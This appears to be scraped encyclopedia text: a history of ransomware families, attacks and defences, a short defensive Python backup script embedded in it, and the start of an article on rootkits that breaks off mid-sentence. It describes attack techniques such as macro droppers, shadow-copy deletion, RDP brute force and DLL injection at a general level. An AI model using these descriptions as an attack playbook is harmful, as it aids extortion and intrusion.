Long before electronic money existed, Young and Yung proposed that electronic money could be extorted through encryption as well, stating that "the virus writer can effectively hold all of the money ransom until half of it is given to him. Even if the e-money was previously encrypted by the user, it is of no use to the user if it gets encrypted by a cryptovirus". 1 They referred to these attacks as being "cryptoviral extortion", an overt attack that is part of a larger class of attacks in a field called cryptovirology, which encompasses both overt and covert attacks. 1 The cryptoviral extortion protocol was inspired by the parasitic relationship between H. R. Giger's facehugger and its host in the movie Alien. 1 16 Examples of extortionate ransomware became prominent in May 2005. 33 By mid-2006, Trojans such as Gpcode, TROJ.RANSOM.A, Archiveus, Krotten, Cryzip, and MayArchive began utilizing more sophisticated RSA encryption schemes, with ever-increasing key sizes. Gpcode.AG, which was detected in June 2006, was encrypted with a 660-bit RSA public key. 34 In June 2008, a variant known as Gpcode.AK was detected. Using a 1024-bit RSA key, it was believed large enough to be computationally infeasible to break without a concerted distributed effort. 35 36 37 38 Encrypting ransomware returned to prominence in late 2013 with the propagation of CryptoLocker—using the Bitcoin digital currency platform to collect ransom money. In December 2013, ZDNet estimated, based on Bitcoin transaction information, that between 15 October and 18 December the operators of CryptoLocker had procured about US$27 million from infected users. 39 The CryptoLocker technique was widely copied in the months that followed, including by CryptoLocker 2.0 (thought not to be related to CryptoLocker), CryptoDefense (which initially contained a major design flaw that stored the private key on the infected system in a user-retrievable location, due to its use of Windows' built-in encryption APIs), 28 40 41 42 and the August 2014 discovery of a Trojan specifically targeting network-attached storage devices produced by Synology. 43 In January 2015, it was reported that ransomware-style attacks had occurred against individual websites via hacking, and through ransomware designed to target Linux-based web servers. 44 45 46 In 2022, Costa Rica received widespread Conti ransomware attacks affecting government, healthcare and industry. 47 This led President Rodrigo Chaves to declare a state of emergency and announce that Costa Rica was "at war" with its ransomware hackers. 48 In some infections, there is a two-stage payload, common in many malware systems. The user is tricked into running a script, which downloads the main virus and executes it. In early versions of the dual-payload system, the script was contained in a Microsoft Office document with an attached VBScript macro, or in a Windows Scripting Facility (WSF) file. As detection systems started blocking these first-stage payloads, the Microsoft Malware Protection Center identified a trend away from these formats and toward LNK files with self-contained Microsoft Windows PowerShell scripts. 49 In 2016, PowerShell was found to be involved in nearly 40% of endpoint security incidents. 50 Some ransomware strains have used proxies tied to Tor hidden services to connect to their command and control servers, increasing the difficulty of tracing the exact location of the criminals. 51 52 Furthermore, dark web vendors have increasingly
started to offer the technology as a service, wherein ransomware is sold, ready for deployment on victims' machines, on a subscription basis, similarly to Adobe Creative Cloud or Office 365. 52 53 54 Symantec has classified ransomware as the most dangerous cyber threat. 55 In August 2010, Russian authorities arrested nine individuals connected to a ransomware Trojan known as WinLock. Unlike the previous Gpcode Trojan, WinLock did not use encryption. Instead, WinLock trivially restricted access to the system by displaying pornographic images and asked users to send a premium-rate SMS (costing around US$10) to receive a code that could be used to unlock their machines. The scam hit numerous users across Russia and neighbouring countries—reportedly earning the group over US$16 million. 19 56 In 2011, a ransomware Trojan surfaced that imitated the Windows Product Activation notice, and informed users that a system's Windows installation had to be re-activated due to being "a victim of fraud". An online activation option was offered (like the actual Windows activation process), but was unavailable, requiring the user to call one of six international numbers to input a six-digit code. While the malware claimed that this call would be free, it was routed through a rogue operator in a country with high international phone rates, who placed the call on hold, causing the user to incur large international long-distance charges. 17 In 2012, Symantec reported that ransomware with a lock screen purporting to be from law enforcement and demanding payment for illegal activity had spread out of Eastern Europe. 57 In February 2013, a ransomware Trojan based on the Stamp.EK exploit kit surfaced; the malware was distributed via sites hosted on the project hosting services SourceForge and GitHub that claimed to offer "fake nude pics" of celebrities. 58 In July 2013, an OS X-specific ransomware Trojan surfaced, which displays a web page that accuses the user of downloading pornography. Unlike its Windows-based counterparts, it does not block the entire computer, but simply exploits the behaviour of the web browser itself to frustrate attempts to close the page through normal means. 59 In July 2013, a 21-year-old man from Virginia, whose computer coincidentally did contain pornographic photographs of underage girls with whom he had conducted sexualized communications, turned himself in to police after receiving and being deceived by FBI MoneyPak ransomware accusing him of possessing child pornography. An investigation discovered the incriminating files, and the man was charged with child sexual abuse and possession of child pornography. 60 The converse of ransomware is a cryptovirology attack invented by Adam L. Young that threatens to publish stolen information from the victim's computer system rather than deny the victim access to it. 61 In a leakware attack, malware exfiltrates sensitive host data either to the attacker or, alternatively, to remote instances of the malware, and the attacker threatens to publish the victim's data unless a ransom is paid. The attack was presented at West Point in 2003 and was summarized in the book Malicious Cryptography as follows: "The attack differs from the extortion attack in the following way. In the extortion attack, the victim is denied access to its own valuable information and has to pay to get it back, where in the attack that is presented here the victim retains access to the information but its disclosure is at the discretion of the computer virus".
62 The attack is rooted in game theory and was originally dubbed "non-zero sum games and survivable malware". The attack can yield monetary gain in cases where the malware acquires access to information that may damage the victim user or organization, e.g., the reputational damage that could result from publishing proof that the attack itself was a success. Exfiltration attacks are usually targeted, with a curated victim list, and often preliminary surveillance of the victim's systems to find potential data targets and weaknesses. 63 64 With the increased popularity of ransomware on PC platforms, ransomware targeting mobile operating systems has also proliferated. Typically, mobile ransomware payloads are blockers, as there is little incentive to encrypt data since it can be easily restored via online synchronization. 65 Mobile ransomware typically targets the Android platform, as it allows applications to be installed from third-party sources. 65 66 The payload is typically distributed as an APK file installed by an unsuspecting user; it may attempt to display a blocking message over top of all other applications, 66 while another used a form of clickjacking to cause the user to give it "device administrator" privileges to achieve deeper access to the system. 67 Different tactics have been used on iOS devices, such as exploiting iCloud accounts and using the Find My iPhone system to lock access to the device. 68 On iOS 10.3, Apple patched a bug in the handling of JavaScript pop-up windows in Safari that had been exploited by ransomware websites. 69 It has recently been shown that ransomware may also target ARM architectures like those that can be found in various Internet-of-Things (IoT) devices, such as Industrial IoT edge devices. 70 In August 2019, researchers demonstrated that it is possible to infect DSLR cameras with ransomware. 71 Digital cameras often use the Picture Transfer Protocol (PTP), a standard protocol used to transfer files. Researchers found that it was possible to exploit vulnerabilities in the protocol to infect target cameras with ransomware (or execute any arbitrary code). This attack was presented at the Defcon security conference in Las Vegas as a proof-of-concept attack (not as actual armed malware). The first attacks were on random users, typically infected through email attachments sent by small groups of criminals, demanding a few hundred dollars in cryptocurrency to unlock files (typically a private individual's photographs and documents) that the ransomware had encrypted. As ransomware matured as a business, organised gangs entered the field, advertising on the dark web for experts, and outsourcing functions. This led to improvement in the quality of ransomware and its success. Rather than random emails, the gangs stole credentials, found vulnerabilities in target networks, and improved the malware to avoid detection by anti-malware scanners. Ransoms demanded escalated into the much larger sums (millions) that an enterprise would pay to recover its data, rather than what an individual would pay for their documents (hundreds). In 2016, a significant uptick in ransomware attacks on hospitals was noted. According to the 2017 Internet Security Threat Report from Symantec Corp, ransomware affected not only IT systems but also patient care, clinical operations, and billing. Online criminals may be motivated by the money available and sense of urgency within the healthcare system.
72 Ransomware is growing rapidly, not only among internet users but also in the IoT environment. 57 The big problem is that millions of dollars are lost by some organizations and industries that have decided to pay, such as Hollywood Presbyterian Medical Center and MedStar Health. 73 According to Symantec's 2019 ISTR report, 2018 saw the first observed decrease in ransomware activity since 2013, a drop of 20 percent. Before 2017, consumers were the preferred victims, but in 2017 this changed dramatically as the focus moved to enterprises. In 2018 this trend accelerated, with enterprises accounting for 81 percent of infections, a 12 percent increase. 74 The common distribution method today is based on email campaigns. In late 2019 the ransomware group Maze downloaded companies' sensitive files before locking them, and threatened to leak the data publicly if the ransom was not paid; in at least one case they did this. Many other gangs followed; "leak sites" were created on the dark web where stolen data could be accessed. Later attacks focused on the threat to leak data, without necessarily locking it—this negated the protection afforded victims by robust backup procedures. As of 2023, there is a risk of hostile governments using ransomware to conceal what is actually intelligence gathering. 75 The first reported death following a ransomware attack was at a German hospital in October 2020. 76 A significant increase in ransomware attacks occurred during the 2020 COVID-19 pandemic. Evidence has demonstrated that the targeted institutions of these attacks included government, finance, and healthcare. Researchers have contended that several different factors can explain the increase in attacks during this time. However, a major factor is that remote work, which became the norm for many industries in 2020, led to the surge in attacks because of the lack of security in comparison to traditional work environments. 77 In 2012, a major ransomware Trojan known as Reveton began to spread. Based on the Citadel Trojan (which, itself, is based on the Zeus Trojan), its payload displays a warning purportedly from a law enforcement agency claiming that the computer has been used for illegal activities, such as downloading unlicensed software or child pornography. Due to this behaviour, it is commonly referred to as the "Police Trojan". 78 79 80 The warning informs the user that to unlock their system, they would have to pay a fine using a voucher from an anonymous prepaid cash service such as Ukash or paysafecard. To increase the illusion that the computer is being tracked by law enforcement, the screen also displays the computer's IP address, while some versions display footage from a victim's webcam to give the illusion that the user is being recorded. 7 81 Reveton initially began spreading in various European countries in early 2012. 7 Variants were localized with templates branded with the logos of different law enforcement organizations based on the user's country; for example, variants used in the United Kingdom contained the branding of organizations such as the Metropolitan Police Service and the Police National E-Crime Unit. Another version contained the logo of the royalty collection society PRS for Music, which specifically accused the user of illegally downloading music. 82 In a statement warning the public about the malware, the Metropolitan Police clarified that they would never lock a computer in such a way as part of an investigation.
7 18 In May 2012, Trend Micro threat researchers discovered templates for variants targeting the United States and Canada, suggesting that its authors may have been planning to target users in North America. 83 By August 2012, a new variant of Reveton began to spread in the United States, claiming to require the payment of a $200 fine to the FBI using a MoneyPak card. 8 9 81 In February 2013, a Russian citizen was arrested in Dubai by Spanish authorities for his connection to a crime ring that had been using Reveton; ten other individuals were arrested on money laundering charges. 84 In August 2014, Avast Software reported that it had found new variants of Reveton that also distribute password-stealing malware as part of its payload. 85 Encrypting ransomware reappeared in September 2013 with a Trojan known as CryptoLocker, which generated a 2048-bit RSA key pair, uploaded it in turn to a command-and-control server, and used it to encrypt files matching a whitelist of specific file extensions. The malware threatened to delete the private key if a payment of Bitcoin or a pre-paid cash voucher was not made within three days of the infection. Due to the extremely large key size it uses, analysts and those affected by the Trojan considered CryptoLocker extremely difficult to repair. 27 86 87 88 Even after the deadline passed, the private key could still be obtained using an online tool, but the price would increase to 10 BTC—which cost approximately US$2300 as of November 2013. 89 90 CryptoLocker was isolated by the seizure of the Gameover ZeuS botnet as part of Operation Tovar, as officially announced by the U.S. Department of Justice on 2 June 2014. The Department of Justice also publicly issued an indictment against the Russian hacker Evgeniy Bogachev for his alleged involvement in the botnet. 91 92 It was estimated that at least US$3 million was extorted with the malware before the shutdown. 12 In September 2014, a wave of ransomware Trojans surfaced that first targeted users in Australia, under the names CryptoWall and CryptoLocker (which is, as with CryptoLocker 2.0, unrelated to the original CryptoLocker). The Trojans spread via fraudulent e-mails claiming to be failed parcel delivery notices from Australia Post; to evade detection by automatic e-mail scanners that follow all links on a page to scan for malware, this variant was designed to require users to visit a web page and enter a CAPTCHA code before the payload is actually downloaded, preventing such automated processes from being able to scan the payload. Symantec determined that these new variants, which it identified as CryptoLocker.F, were, again, unrelated to the original CryptoLocker due to differences in their operation. 93 94 A notable victim of the Trojans was the Australian Broadcasting Corporation; live programming on its television news channel ABC News 24 was disrupted for half an hour and shifted to Melbourne studios due to a CryptoWall infection on computers at its Sydney studio. 95 96 97 Another Trojan in this wave, TorrentLocker, initially contained a design flaw comparable to CryptoDefense; it used the same keystream for every infected computer, making the encryption trivial to overcome. However, this flaw was later fixed. 40 By late November 2014, it was estimated that over 9,000 users had been infected by TorrentLocker in Australia alone, trailing only Turkey with 11,700 infections. 98 Another major ransomware Trojan targeting Windows, CryptoWall, first appeared in 2014.
One strain of CryptoWall was distributed as part of a malvertising campaign on the Zedo ad network in late September 2014 that targeted several major websites; the ads redirected to rogue websites that used browser plugin exploits to download the payload. A Barracuda Networks researcher also noted that the payload was signed with a digital signature in an effort to appear trustworthy to security software. 99 CryptoWall 3.0 used a payload written in JavaScript as part of an email attachment, which downloads executables disguised as JPG images. To further evade detection, the malware creates new instances of explorer.exe and svchost.exe to communicate with its servers. When encrypting files, the malware also deletes volume shadow copies and installs spyware that steals passwords and Bitcoin wallets. 100 The FBI reported in June 2015 that nearly 1,000 victims had contacted the bureau's Internet Crime Complaint Center to report CryptoWall infections, and estimated losses of at least $18 million. 13 The most recent version, CryptoWall 4.0, enhanced its code to avoid antivirus detection, and encrypts not only the data in files but also the file names. 101 Fusob is a major family of mobile ransomware. Between April 2015 and March 2016, Fusob accounted for about 56 percent of mobile ransomware. 102 Like most other pieces of ransomware, it employs scare tactics to extort a hefty sum from the user. 103 The app acts as if it were a notice from the authorities, demanding that the victim pay a fine of US$100 to $200 or otherwise face a fictitious criminal charge. Fusob requests iTunes gift cards for payment, unlike most cryptocurrency-centric ransomware. In order to infect devices, Fusob masquerades as a pornographic video player. 104 When it is installed, it first checks the device's system language. If the language is Russian or Eastern European, Fusob remains dormant. Otherwise, it locks the device and demands ransom. About 40% of victims are in Germany, while the United Kingdom encompasses 14.5% of victims and the US encompasses 11.4%. Fusob and Small (another family of ransomware) represented over 93% of mobile ransomware between 2015 and 2016. In May 2017, the WannaCry ransomware attack spread through the Internet, using an exploit vector named EternalBlue, which was allegedly leaked from the U.S. National Security Agency. The ransomware attack, unprecedented in scale, 105 infected more than 230,000 computers in over 150 countries, 106 using 20 different languages to demand money from users in the Bitcoin cryptocurrency. WannaCry demanded US$300 per computer. 107 The attack affected Telefónica and several other large companies in Spain, as well as parts of the British National Health Service (NHS), where at least 16 hospitals had to turn away patients or cancel scheduled operations, 108 FedEx, Deutsche Bahn, Honda, 109 Renault, as well as the Russian Interior Ministry and Russian telecom MegaFon. 110 The attackers gave their victims a seven-day deadline from the day their computers got infected, after which the encrypted files would be deleted. 111 Petya was first discovered in March 2016; unlike other forms of encrypting ransomware, the malware aimed to infect the master boot record, installing a payload which encrypts the file tables of the NTFS file system the next time that the infected system boots, blocking the system from booting into Windows at all until the ransom is paid.
Check Point reported that despite what it believed to be an innovative evolution in ransomware design, it had resulted in relatively fewer infections than other ransomware active around the same time frame. 112 On 27 June 2017, a heavily modified version of Petya was used for a global cyberattack primarily targeting Ukraine (but affecting many countries 113 ). This version had been modified to propagate using the same EternalBlue exploit that was used by WannaCry. Due to another design change, it is also unable to actually unlock a system after the ransom is paid; this led to security analysts speculating that the attack was not meant to generate illicit profit, but to simply cause disruption. 114 115 On 24 October 2017, some users in Russia and Ukraine reported a new ransomware attack, named "Bad Rabbit", which follows a similar pattern to WannaCry and Petya: it encrypts the user's file tables and then demands a Bitcoin payment to decrypt them. ESET believed the ransomware to have been distributed by a bogus update to Adobe Flash software. 116 Agencies affected by the ransomware included Interfax, Odesa International Airport, Kyiv Metro, and the Ministry of Infrastructure of Ukraine. 117 As it used corporate network structures to spread, the ransomware was also discovered in other countries, including Turkey, Germany, Poland, Japan, South Korea, and the United States. 118 Experts believed the ransomware attack was tied to the Petya attack in Ukraine (especially because Bad Rabbit's code has many overlapping and analogical elements to the code of Petya/NotPetya; 119 according to CrowdStrike, Bad Rabbit and NotPetya's dynamic link library (DLL) share 67 percent of the same code 120 ), though the only clues to the culprits' identity are the names of characters from the Game of Thrones series embedded within the code. 118 Security experts found that the ransomware did not use the EternalBlue exploit to spread, and a simple method to inoculate an unaffected machine running older Windows versions was found by 24 October 2017. 121 122 Further, the sites that had been used to spread the bogus Flash update went offline or removed the problematic files within a few days of its discovery, effectively killing off the spread of Bad Rabbit. 118 In 2016, a new strain of ransomware emerged that was targeting JBoss servers. 123 This strain, named "SamSam", was found to bypass the process of phishing or illicit downloads in favor of exploiting vulnerabilities on weak servers. 124 The malware uses a Remote Desktop Protocol brute-force attack to guess weak passwords until one is broken. The virus has been behind attacks on government and healthcare targets, with notable hacks occurring against the town of Farmington, New Mexico, the Colorado Department of Transportation, Davidson County, North Carolina, and, most recently, a ransomware attack on the infrastructure of Atlanta. 124 Mohammad Mehdi Shah Mansouri (born in Qom, Iran, in 1991) and Faramarz Shahi Savandi (born in Shiraz, Iran, in 1984) are wanted by the FBI for allegedly launching SamSam ransomware. 125 The two have allegedly made $6 million from extortion and caused over $30 million in damages using the malware. 126 On May 7, 2021, a cyberattack was executed on the US Colonial Pipeline.
The Federal Bureau of Investigation identified DarkSide as the perpetrator of the Colonial Pipeline ransomware attack, carried out by malicious code, which led to a voluntary shutdown of the main pipeline supplying 45% of fuel to the East Coast of the United States. The attack was described as the worst cyberattack to date on U.S. critical infrastructure. DarkSide successfully extorted about 75 Bitcoin (almost US$5 million) from Colonial Pipeline. U.S. officials are investigating whether the attack was purely criminal or took place with the involvement of the Russian government or another state sponsor. Following the attack, DarkSide posted a statement claiming that "We are apolitical, we do not participate in geopolitics...Our goal is to make money and not creating problems for society." In May 2021, the FBI and Cybersecurity and Infrastructure Security Agency (CISA) issued a joint alert urging the owners and operators of critical infrastructure to take certain steps to reduce their vulnerability to DarkSide ransomware and ransomware in general. Syskey is a utility that was included with Windows NT-based operating systems to encrypt the user account database, optionally with a password. The tool has sometimes been effectively used as ransomware during technical support scams—where a caller with remote access to the computer may use the tool to lock the user out of their computer with a password known only to them. 127 Syskey was removed from later versions of Windows 10 and Windows Server in 2017, due to being obsolete and "known to be used by hackers as part of ransomware scams". 128 129 Ransomware-as-a-service (RaaS) became a notable method after the Russia-based 130 or Russian-speaking 131 group REvil staged operations against several targets, including the Brazil-based JBS S.A. in May 2021, and the US-based Kaseya Limited in July 2021. 132 After a July 9, 2021 phone call between United States president Joe Biden and Russian president Vladimir Putin, Biden told the press, "I made it very clear to him that the United States expects when a ransomware operation is coming from his soil even though it's not sponsored by the state, we expect them to act if we give them enough information to act on who that is." Biden later added that the United States would take the group's servers down if Putin did not. 133 134 Four days later, REvil websites and other infrastructure vanished from the internet. 135 If an attack is suspected or detected in its early stages, it takes some time for encryption to take place; immediate removal of the malware (a relatively simple process) before it has completed would stop further damage to data, without salvaging any already lost. 136 137 Security experts have suggested precautionary measures for dealing with ransomware. Using software or other security policies to block known payloads from launching will help to prevent infection, but will not protect against all attacks. 27 138 As such, having a proper backup solution is a critical component to defending against ransomware.
Note that, because many ransomware attackers will not only encrypt the victim's live machine but will also attempt to delete any hot backups stored locally or accessible over the network on a NAS, it is also critical to maintain "offline" backups of data in locations inaccessible from any potentially infected computer, such as external storage drives or devices that do not have any access to any network (including the Internet); this prevents them from being accessed by the ransomware. Moreover, if using a NAS or cloud storage, the computer should have append-only permission to the destination storage, such that it cannot delete or overwrite previous backups. According to Comodo, applying attack surface reduction at the OS or kernel level provides a materially reduced attack surface, which results in a heightened security posture. 139 140 141 Installing security updates issued by software vendors can mitigate the vulnerabilities leveraged by certain strains to propagate. 142 143 144 145 146 Other measures include cyber hygiene (exercising caution when opening e-mail attachments and links), network segmentation, and keeping critical computers isolated from networks. 147 148 Furthermore, to mitigate the spread of ransomware, measures of infection control can be applied. 149 These may include disconnecting infected machines from all networks, educational programs, 150 effective communication channels, malware surveillance, and ways of collective participation. 149 In August 2021, the Cybersecurity and Infrastructure Security Agency (CISA) released a report that provided guidance for how to mitigate ransomware attacks. This was due to a significant jump in recent attacks related to ransomware. These attacks included aggression against a US pipeline company and a software company, which impacted the downstream customers of MSPs. 151 A number of file systems keep snapshots of the data they hold, which can be used to recover the contents of files from a time prior to the ransomware attack in the event the ransomware does not disable it. There are a number of tools intended specifically to decrypt files locked by ransomware, although successful recovery may not be possible. 2 154 If the same encryption key is used for all files, decryption tools use files for which there are both uncorrupted backups and encrypted copies (a known-plaintext attack, in the jargon of cryptanalysis; this only works when the cipher the attacker used was weak to begin with, being vulnerable to a known-plaintext attack); recovery of the key, if it is possible, may take several days. 155 Free ransomware decryption tools can help decrypt files encrypted by the following forms of ransomware: AES_NI, Alcatraz Locker, Apocalypse, BadBlock, Bart, BTCWare, Crypt888, CryptoMix, CrySiS, EncrypTile, FindZip, Globe, Hidden Tear, Jigsaw, LambdaLocker, Legion, NoobCrypt, Stampado, SZFLocker, TeslaCrypt, XData. 156 Ransomware encryption that has been cracked by security researchers is typically abandoned for criminal purposes; thus in practice most attacks cannot be reverted by breaking encryption. 157 The No More Ransom Project is an initiative by the Netherlands' police's National High Tech Crime Unit, Europol's European Cybercrime Centre, Kaspersky Lab and McAfee to help ransomware victims recover their data without paying a ransom. 158 They offer a free CryptoSheriff tool to analyze encrypted files and search for decryption tools.
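The append-only, never-overwriting backup approach recommended earlier in this passage can be illustrated with a minimal Python sketch. This is only an illustration under stated assumptions: the source and destination paths are hypothetical, and genuine append-only protection has to be enforced by the storage side (for example, NAS or cloud bucket permissions), since a script running on an already infected machine could itself be tampered with.
# Minimal sketch of a versioned, never-overwriting backup (hypothetical paths).
# Each run writes a fresh timestamped directory and records a SHA-256 manifest
# so the copy can later be verified from a trusted environment.
import hashlib
import shutil
from datetime import datetime, timezone
from pathlib import Path
SOURCE = Path("/home/user/documents")        # hypothetical data to protect
BACKUP_ROOT = Path("/mnt/offline_backup")    # hypothetical offline/NAS mount
def make_versioned_backup(source: Path, backup_root: Path) -> Path:
    stamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ")
    dest = backup_root / f"backup-{stamp}"
    shutil.copytree(source, dest)            # raises if dest already exists
    manifest = dest / "MANIFEST.sha256"
    with manifest.open("w") as out:
        for f in sorted(p for p in dest.rglob("*") if p.is_file() and p != manifest):
            digest = hashlib.sha256(f.read_bytes()).hexdigest()
            out.write(f"{digest}  {f.relative_to(dest)}\n")
    return dest
if __name__ == "__main__":
    print("Backup written to", make_versioned_backup(SOURCE, BACKUP_ROOT))
Keeping each run in its own timestamped directory mirrors the append-only idea: the client never deletes or rewrites earlier backups, and the manifest lets an offline check confirm that older copies have not silently changed.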
159 In addition, old copies of files that have previously been deleted may still exist on the disk. In some cases, these deleted versions may still be recoverable using software designed for that purpose. A 2019 ProPublica investigation found that the cybersecurity firms Proven Data Recovery and Monstercloud, which advertised ransom-free decryption services, would typically simply pay the ransom and charge the victim a higher price. 157 SamSam hackers dealt with Proven Data so frequently that they would recommend the company to victims having technical difficulties making payment. 157 Other companies like Coveware were more transparent in offering the service of paying the hackers and patching insecure systems. 157 Many American victims found the ransom amount was too low to meet the United States Department of Justice threshold for federal involvement, but that local police lacked the technical capabilities to help and were often victims themselves. 157 A British student, Zain Qaiser, from Barking, London, was jailed for more than six years at Kingston upon Thames Crown Court for his ransomware attacks in 2019. 160 He is said to have been "the most prolific cyber criminal to be sentenced in the UK". He became active when he was only 17. He contacted the Russian controller of one of the most powerful attacks, believed to be the Lurk malware gang, and arranged for a split of his profits. He also contacted online criminals from China and the US to move the money. 160 For about one and a half years, he posed as a legitimate supplier of online promotions of book advertising on some of the world's most visited legal pornography websites. Each of the adverts that were promoted on the websites contained the Reveton ransomware strain of the malicious Angler Exploit Kit (AEK) 161 that seized control of the machine. Investigators discovered about £700,000 of earnings, although his network may have earned more than £4 million. He may have hidden some money using cryptocurrencies. The ransomware would instruct victims to buy GreenDot MoneyPak vouchers and enter the code in the Reveton panel displayed on the screen. This money entered a MoneyPak account managed by Qaiser, who would then deposit the voucher payments into the debit card account of his American co-conspirator, Raymond Odigie Uadiale. Uadiale was a student at Florida International University during 2012 and 2013 and later worked for Microsoft. Uadiale would convert the money into Liberty Reserve digital currency and deposit it into Qaiser's Liberty Reserve account. 162 A breakthrough in this case occurred in May 2013 when authorities from several countries seized the Liberty Reserve servers, obtaining access to all its transactions and account history. Qaiser was running encrypted virtual machines on his MacBook Pro with both Mac and Windows operating systems. 163 He could not be tried earlier because he was sectioned (involuntarily committed) under the UK Mental Health Act of 1983 at Goodmayes Hospital, where he was found to be using the hospital Wi-Fi to access his advertising sites. His lawyer claimed that Qaiser had suffered from mental illness. 160 Russian police arrested 50 members of the Lurk malware gang in June 2016. 164 Uadiale, a naturalized US citizen of Nigerian descent, was jailed for 18 months. 165 The publication of proof-of-concept attack code is common among academic researchers and vulnerability researchers. It teaches the nature of the threat, conveys the gravity of the issues, and enables countermeasures to be devised and put into place.
However, lawmakers with the support of law-enforcement bodies are contemplating making the creation of ransomware illegal. In the state of Maryland, the original draft of HB 340 made it a felony to create ransomware, punishable by up to 10 years in prison. 166 However, this provision was removed from the final version of the bill. A minor in Japan was arrested for creating and distributing ransomware code. 167 Young and Yung have had the ANSI C source code to a ransomware cryptotrojan on-line, at cryptovirology.com, since 2005 as part of a cryptovirology book being written. The source code to the cryptotrojan is still live on the Internet and is associated with a draft of Chapter 2. 168 |
66 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Rootkit | A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed (for example, to an unauthorized user) and often masks its existence or the existence of other software. 1 The term rootkit is a compound of "root" (the traditional name of the privileged account on Unix-like operating systems) and the word "kit" (which refers to the software components that implement the tool). 2 The term "rootkit" has negative connotations through its association with malware. 1 Rootkit installation can be automated, or an attacker can install it after having obtained root or administrator access. 3 Obtaining this access is a result of direct attack on a system, i.e. exploiting a vulnerability (such as privilege escalation) or a password (obtained by cracking or social engineering tactics like "phishing"). Once installed, it becomes possible to hide the intrusion as well as to maintain privileged access. Full control over a system means that existing software can be modified, including software that might otherwise be used to detect or circumvent it. Rootkit detection is difficult because a rootkit may be able to subvert the software that is intended to find it. Detection methods include using an alternative and trusted operating system, behavior-based methods, signature scanning, difference scanning, and memory dump analysis. Removal can be complicated or practically impossible, especially in cases where the rootkit resides in the kernel; reinstallation of the operating system may be the only available solution to the problem. When dealing with firmware rootkits, removal may require hardware replacement, or specialized equipment. The term rootkit, rkit, or root kit originally referred to a maliciously modified set of administrative tools for a Unix-like operating system that granted "root" access. 4 If an intruder could replace the standard administrative tools on a system with a rootkit, the intruder could obtain root access over the system whilst simultaneously concealing these activities from the legitimate system administrator. These first-generation rootkits were trivial to detect by using tools such as Tripwire that had not been compromised to access the same information. 5 6 Lane Davis and Steven Dake wrote the earliest known rootkit in 1990 for Sun Microsystems' SunOS UNIX operating system. 7 In the lecture he gave upon receiving the Turing award in 1983, Ken Thompson of Bell Labs, one of the creators of Unix, theorized about subverting the C compiler in a Unix distribution and discussed the exploit. The modified compiler would detect attempts to compile the Unix login command and generate altered code that would accept not only the user's correct password, but an additional "backdoor" password known to the attacker. Additionally, the compiler would detect attempts to compile a new version of the compiler, and would insert the same exploits into the new compiler. A review of the source code for the login command or the updated compiler would not reveal any malicious code. 8 This exploit was equivalent to a rootkit. The first documented computer virus to target the personal computer, discovered in 1986, used cloaking techniques to hide itself: the Brain virus intercepted attempts to read the boot sector, and redirected these to elsewhere on the disk, where a copy of the original boot sector was kept. 
1 Over time, DOS-virus cloaking methods became more sophisticated. Advanced techniques included hooking low-level disk INT 13H BIOS interrupt calls to hide unauthorized modifications to files. 1 The first malicious rootkit for the Windows NT operating system appeared in 1999: a trojan called NTRootkit created by Greg Hoglund. 9 It was followed by HackerDefender in 2003. 1 The first rootkit targeting Mac OS X appeared in 2009, 10 while the Stuxnet worm was the first to target programmable logic controllers (PLC). 11 In 2005, Sony BMG published CDs with copy protection and digital rights management software called Extended Copy Protection, created by software company First 4 Internet. The software included a music player but silently installed a rootkit which limited the user's ability to access the CD. 12 Software engineer Mark Russinovich, who created the rootkit detection tool RootkitRevealer, discovered the rootkit on one of his computers. 1 The ensuing scandal raised the public's awareness of rootkits. 13 To cloak itself, the rootkit hid any file starting with "$sys$" from the user. Soon after Russinovich's report, malware appeared which took advantage of the existing rootkit on affected systems. 1 One BBC analyst called it a "public relations nightmare". 14 Sony BMG released patches to uninstall the rootkit, but it exposed users to an even more serious vulnerability. 15 The company eventually recalled the CDs. In the United States, a class-action lawsuit was brought against Sony BMG. 16 The Greek wiretapping case of 2004-05, also referred to as Greek Watergate, 17 involved the illegal telephone tapping of more than 100 mobile phones on the Vodafone Greece network belonging mostly to members of the Greek government and top-ranking civil servants. The taps began sometime near the beginning of August 2004 and were removed in March 2005 without discovering the identity of the perpetrators. The intruders installed a rootkit targeting Ericsson's AXE telephone exchange. According to IEEE Spectrum, this was "the first time a rootkit has been observed on a special-purpose system, in this case an Ericsson telephone switch". 18 The rootkit was designed to patch the memory of the exchange while it was running, enable wiretapping while disabling audit logs, patch the commands that list active processes and active data blocks, and modify the data block checksum verification command. A "backdoor" allowed an operator with sysadmin status to deactivate the exchange's transaction log, alarms and access commands related to the surveillance capability. 18 The rootkit was discovered after the intruders installed a faulty update, which caused SMS texts to be undelivered, leading to an automated failure report being generated. Ericsson engineers were called in to investigate the fault and discovered the hidden data blocks containing the list of phone numbers being monitored, along with the rootkit and illicit monitoring software. Modern rootkits do not elevate access, 4 but rather are used to make another software payload undetectable by adding stealth capabilities. 9 Most rootkits are classified as malware, because the payloads they are bundled with are malicious. For example, a payload might covertly steal user passwords, credit card information, computing resources, or conduct other unauthorized activities.
A small number of rootkits may be considered utility applications by their users: for example, a rootkit might cloak a CD-ROM-emulation driver, allowing video game users to defeat anti-piracy measures that require insertion of the original installation media into a physical optical drive to verify that the software was legitimately purchased. Rootkits and their payloads have many uses, and in some instances rootkits provide desired functionality and may be installed intentionally on behalf of the computer user. There are at least five types of rootkit, ranging from those at the lowest level in firmware (with the highest privileges), through to the least privileged user-based variants that operate in Ring 3. Hybrid combinations of these may occur, spanning, for example, user mode and kernel mode. 26 User-mode rootkits run in Ring 3, along with other applications as user-level code, rather than as low-level system processes. 27 They have a number of possible installation vectors to intercept and modify the standard behavior of application programming interfaces (APIs). Some inject a dynamically linked library (such as a .DLL file on Windows, or a .dylib file on Mac OS X) into other processes, and are thereby able to execute inside any target process to spoof it; others with sufficient privileges simply overwrite the memory of a target application. A number of injection mechanisms can be used. 27 As one description puts it: "...since user mode applications all run in their own memory space, the rootkit needs to perform this patching in the memory space of every running application. In addition, the rootkit needs to monitor the system for any new applications that execute and patch those programs' memory space before they fully execute." Kernel-mode rootkits run with the highest operating system privileges (Ring 0) by adding code or replacing portions of the core operating system, including both the kernel and associated device drivers. Most operating systems support kernel-mode device drivers, which execute with the same privileges as the operating system itself. As such, many kernel-mode rootkits are developed as device drivers or loadable modules, such as loadable kernel modules in Linux or device drivers in Microsoft Windows. This class of rootkit has unrestricted security access, but is more difficult to write. 29 The 